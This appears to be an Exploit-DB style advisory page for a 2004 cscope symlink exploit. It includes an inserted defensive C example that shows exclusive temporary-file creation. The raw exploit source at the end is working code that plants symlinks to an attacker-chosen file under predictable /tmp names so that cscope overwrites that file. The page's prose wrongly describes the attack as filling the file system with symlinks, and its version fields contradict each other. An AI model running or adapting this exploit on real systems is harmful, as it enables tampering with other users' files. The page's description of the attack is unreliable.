Vendor: RXcscope
By: Gangstuck / Psirac
CVSS: 7.5 (HIGH)
RXcscope exploit version 15.5 and minor
Product Name: RXcscope
Affected Version From: 15.5
Affected Version To: 15.5
Patch Exists: NO
2004

RXcscope Exploit

This exploit targets RXcscope version 15.5 and minor. It allows an attacker to create symlinks with arbitrary names to a specified target file. The exploit takes two command-line arguments: the target file and the maximum number of file creations. It then creates symlinks with names in the format cscope<process_id>.<iteration_number> in the temporary directory. The process IDs start from the current process ID and go up to the specified maximum process ID. The iteration number starts from 0 and increases by 1 for each symlink created. This exploit can be used to perform a denial-of-service attack by exhausting the file system with a large number of symlinks.

Mitigation:

Upgrade to a version of RXcscope that is not affected by this exploit.
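
For developers reviewing their own temporary-file handling, the following added example (not code from this page or from the cscope project) shows the creation pattern that is not affected by a pre-existing link under a predictable cscope<pid>.<n> name. The function names are hypothetical, and the self-check assumes a writable /tmp and works only inside a private scratch directory it creates itself.

```c
#define _XOPEN_SOURCE 700   /* mkdtemp, mkstemp, symlink */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a file under a fixed name only if that name is unused. With
 * O_CREAT|O_EXCL, open() fails with EEXIST when the name already exists,
 * including when it is a symlink, so an existing link is never followed. */
int open_temp_excl(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Preferred: mkstemp() picks an unpredictable name and opens it exclusively. */
int open_temp_random(const char *dir, char *out, size_t outlen) {
    if (snprintf(out, outlen, "%s/cscopeXXXXXX", dir) >= (int)outlen)
        return -1;
    return mkstemp(out);
}

/* Self-check inside a private scratch directory (constructed input).
 * Returns 0 when every expectation holds, otherwise a bitmask of failures. */
int demo(void) {
    char dir[] = "/tmp/tmpfile-demo-XXXXXX";   /* assumes /tmp is writable */
    char target[96], fixed[96], rnd[96];
    struct stat st;
    int rc = 0, fd;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(fixed, sizeof fixed, "%s/cscope%d.1", dir, (int)getpid());
    if (symlink(target, fixed) != 0) rc |= 1;   /* the name is already taken */

    errno = 0;
    fd = open_temp_excl(fixed);
    if (fd != -1 || errno != EEXIST) rc |= 2;   /* must refuse the name */
    if (fd != -1) close(fd);
    if (lstat(target, &st) == 0) rc |= 4;       /* target must not appear */

    fd = open_temp_random(dir, rnd, sizeof rnd);
    if (fd == -1 || fstat(fd, &st) != 0 || (st.st_mode & 077) != 0) rc |= 8;
    if (fd != -1) { close(fd); unlink(rnd); }
    unlink(fixed);
    rmdir(dir);
    return rc;
}

int main(void) { return demo(); }
```

A program that opens the predictable name with fopen(path, "w") instead would follow the link and write to whatever it points at, which is why the exclusive open or mkstemp() is the fix to look for when auditing similar code.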
Source

Exploit-DB raw data:

/* RXcscope exploit version 15.5 and minor */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BSIZE 64

int
main(int ac, char *av[]) {
        pid_t cur;
        u_int i=0, lst;
        char buffer[BSIZE + 1];
        
        fprintf(stdout, "\n --[ Cscope Exploit ]--\n"\
                        " version 15.5 and minor \n" \
                        " Gangstuck / Psirac\n" \
                        " <research@rexotec.com>\n\n");
                        
        if (ac != 3) {
                fprintf(stderr, "Usage: %s <target> <max file creation>\n", av[0]);
                return 1;
        }
        
        cur=getpid();
        lst=cur+atoi(av[2]);
        
        fprintf(stdout, " -> Current process id is ..... [%5d]\n" \
                        " -> Last process id is ........ [%5d]\n", cur, lst);
        
        while (++cur != lst) {
                snprintf(buffer, BSIZE, "%s/cscope%d.%d", P_tmpdir, cur, (i==2) ? --i : ++i);
                symlink(av[1], buffer);
        }

        return 0;
}

// milw0rm.com [2004-12-17]